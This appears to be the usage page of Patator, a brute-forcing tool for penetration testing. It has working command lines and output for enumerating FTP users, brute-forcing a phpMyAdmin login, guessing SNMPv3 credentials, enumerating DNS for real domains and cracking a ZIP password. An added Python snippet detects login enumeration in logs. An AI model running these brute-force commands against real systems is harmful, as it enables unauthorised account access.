
Patator is a multi-purpose brute-forcer with a modular design and flexible usage.
Currently it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_passd     : Brute-force poppassd (not POP3)
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Forward lookup subdomains
 * dns_reverse   : Reverse lookup subnets
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files
 

The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo

Patator is NOT script-kiddie friendly; please read the README inside patator.py before reporting.


  • FTP : Enumerate valid logins on an overly verbose server
 $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore,reset,retry:code=500 -x reset:code=230 -x ignore:mesg='Login incorrect.'
 22:27:29 patator    INFO - Starting Patator v0.2
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:30 patator    INFO - 530 18          | root                        |     1 | Permission denied.
 22:27:31 patator    INFO - 230 17          | ftp                         |    13 | Login successful.
 22:27:34 patator    INFO - 530 18          | admin                       |    23 | Permission denied.
 22:27:34 patator    INFO - 530 18          | oracle                      |    31 | Permission denied.
 22:28:02 patator    INFO - 530 18          | test                        |   179 | Permission denied.
 22:28:21 patator    INFO - 230 17          | anonymous                   |   283 | Login successful.
 22:28:26 patator    INFO - 530 18          | ftpuser                     |   357 | Permission denied.
 22:28:41 patator    INFO - 530 18          | nobody                      |   402 | Permission denied.
 ...
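
A defender-side view of the FTP run above, as an added example that is not part of Patator or the original page: it flags clients that fail logins for many distinct usernames within a short window. The log format, the sample lines, and the names `detect_enumeration`, `window` and `max_users` are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in a simplified, hypothetical format (not a real
# FTP daemon's format): "<ISO timestamp> <client ip> USER=<login> <reply code>"
SAMPLE_LOG = """\
2012-01-01T22:27:30 10.0.0.7 USER=root 530
2012-01-01T22:27:31 10.0.0.7 USER=ftp 230
2012-01-01T22:27:34 10.0.0.7 USER=admin 530
2012-01-01T22:27:34 10.0.0.7 USER=oracle 530
2012-01-01T22:27:40 10.0.0.9 USER=alice 530
2012-01-01T22:27:52 10.0.0.9 USER=alice 530
2012-01-01T22:28:02 10.0.0.7 USER=test 530
2012-01-01T22:28:05 10.0.0.9 USER=alice 230
2012-01-01T22:28:26 10.0.0.7 USER=ftpuser 530
2012-01-01T22:28:41 10.0.0.7 USER=nobody 530
"""

LINE_RE = re.compile(r"^(\S+) (\S+) USER=(\S+) (\d{3})$")

def detect_enumeration(lines, window=timedelta(seconds=60), max_users=4):
    """Return {client: peak distinct failed logins in any window}
    for clients whose peak exceeds max_users. Lines must be time-ordered."""
    recent = defaultdict(deque)  # client -> (time, login) of recent failures
    peak = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        ts, client, login, code = m.groups()
        if code != "530":  # only failed logins count towards the threshold
            continue
        when = datetime.fromisoformat(ts)
        q = recent[client]
        q.append((when, login))
        while when - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        # Distinct logins matter: one user mistyping a password stays at 1.
        peak[client] = max(peak[client], len({u for _, u in q}))
    return {c: n for c, n in peak.items() if n > max_users}

if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG.splitlines()))
```

Counting distinct logins rather than raw failures keeps a single user who mistypes a password (10.0.0.9 in the sample) below the threshold.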
 

  • HTTP : Brute-force phpMyAdmin logon
 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
 10:55:50 patator    INFO - Starting Patator v0.2
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:                       |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd               |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
 
Payload #22 was a false positive:
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 <div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>

  • SNMPv3 : Find valid usernames
 $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
 17:51:06 patator    INFO - Starting Patator v0.2
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:06 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:11 patator    INFO - 0-0 11          | robert                      |    55 | wrongDigest
 17:51:12 patator    INFO - Progress:  20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
 17:51:33 patator    INFO - 0-0 11          | myuser                      |   311 | wrongDigest
 17:51:36 patator    INFO - Hits/Done/Size/Fail: 2/345/345/0, Avg: 11 r/s, Time: 0h 0m 30s
 

  • SNMPv3 : Find valid passwords

 $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
 17:52:15 patator    INFO - Starting Patator v0.2
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:15 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:16 patator    INFO - 0-0 69          | password123                 |    16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
 17:52:17 patator    INFO - Hits/Done/Size/Fail: 1/50/50/0, Avg: 38 r/s, Time: 0h 0m 1s
 

  • DNS : Forward lookup
 $ dns_forward domain=FILE0.hsc.fr 0=names.txt -x ignore:code=3
 10:53:20 patator    INFO - Starting Patator v0.2
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - 0 35            | www                         |     4 | NOERROR www.hsc.fr / 217.174.211.25
 10:53:20 patator    INFO - 0 51            | mail                        |    32 | NOERROR itesec.hsc.fr / 192.70.106.33 / mail.hsc.fr
 10:53:21 patator    INFO - 0 8             | test                        |    54 | NOERROR 
 10:53:21 patator    INFO - 0 34            | wap                         |    66 | NOERROR wap.hsc.fr / 192.70.106.33
 10:53:21 patator    INFO - 0 38            | webmail                     |    62 | NOERROR webmail.hsc.fr / 192.70.106.95
 10:53:21 patator    INFO - 0 51            | news                        |   114 | NOERROR itesec.hsc.fr / 192.70.106.33 / news.hsc.fr
 10:53:22 patator    INFO - 0 61            | mailhost                    |   137 | NOERROR mailhost.hsc.fr / 2001:7a8:1155:2::abcd 192.70.106.33
 10:53:22 patator    INFO - 0 55            | extranet                    |   131 | NOERROR itesec.hsc.fr / 192.70.106.33 / extranet.hsc.fr
 Hostmap ------------------------------------------
                    mailhost.hsc.fr 2001:7a8:1155:2::abcd
                    mailhost.hsc.fr 192.70.106.33
                         wap.hsc.fr 192.70.106.33
                      itesec.hsc.fr 192.70.106.33
                    extranet.hsc.fr .
                        mail.hsc.fr .
                        news.hsc.fr .
                     webmail.hsc.fr 192.70.106.95
                         www.hsc.fr 217.174.211.25
 Domains ------------------------------------------
                             hsc.fr 6
 Networks -----------------------------------------
                             2001:7a8:1155:2::abcd
                                      192.70.106.x
                                    217.174.211.25
 10:53:34 patator    INFO - Hits/Done/Size/Fail: 8/300/300/0, Avg: 21 r/s, Time: 0h 0m 14s
 
 Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address.
 

  • DNS : Reverse lookup two netblocks owned by Google

 $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
 10:52:17 patator    INFO - Starting Patator v0.2
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:17 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:18 patator    INFO - 0 22            | 216.239.32.10               |    11 | NOERROR ns1.google.com
 10:52:18 patator    INFO - 0 21            | 216.239.32.11               |    12 | NOERROR ns.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.32.15               |    16 | NOERROR time1.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.17               |   274 | NOERROR smtp-out.google.com
 10:52:18 patator    INFO - 0 23            | 216.239.33.12               |   269 | NOERROR dns1.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.5                |   262 | NOERROR proxy.google.com
 10:52:18 patator    INFO - 0 28            | 216.239.33.18               |   275 | NOERROR smtp-out3.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.28               |   285 | NOERROR smtp8.google.com
 10:52:18 patator    INFO - 0 26            | 216.239.33.20               |   277 | NOERROR esc-out.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.22               |   279 | NOERROR transfer.google.com
 10:52:19 patator    INFO - 0 22            | 216.239.34.10               |   523 | NOERROR ns2.google.com
 10:52:19 patator    INFO - 0 24            | 216.239.34.15               |   528 | NOERROR time2.google.com
 ^C
 Hostmap ------------------------------------------
                     ns1.google.com 216.239.32.10
                      ns.google.com 216.239.32.11
                   time1.google.com 216.239.32.15
                   proxy.google.com 216.239.33.5
                    dns1.google.com 216.239.33.12
                smtp-out.google.com 216.239.33.17
               smtp-out3.google.com 216.239.33.18
                 esc-out.google.com 216.239.33.20
                transfer.google.com 216.239.33.22
                   smtp8.google.com 216.239.33.28
                     ns2.google.com 216.239.34.10
                   time2.google.com 216.239.34.15
 Domains ------------------------------------------
                         google.com 12
 Networks -----------------------------------------
                                      216.239.32.x
                                      216.239.33.x
                                      216.239.34.x
 10:52:20 patator    INFO - Hits/Done/Size/Fail: 12/664/4352/0, Avg: 238 r/s, Time: 0h 0m 2s
 10:52:20 patator    INFO - To resume execution, pass --resume 67,74,68,66,63,69,54,64,69,70
 

  • ZIP : Crack a password-protected ZIP file (older pkzip encryption was previously not supported in JtR)
 $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 
 10:54:29 patator    INFO - Starting Patator v0.2
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:30 patator    INFO - 0 82            | love                        |   387 | 0 [82] No errors detected in compressed data of challenge1.zip.
 ^C
 10:54:31 patator    INFO - Hits/Done/Size/Fail: 1/1589/5000/0, Avg: 699 r/s, Time: 0h 0m 2s
 10:54:31 patator    INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154
 
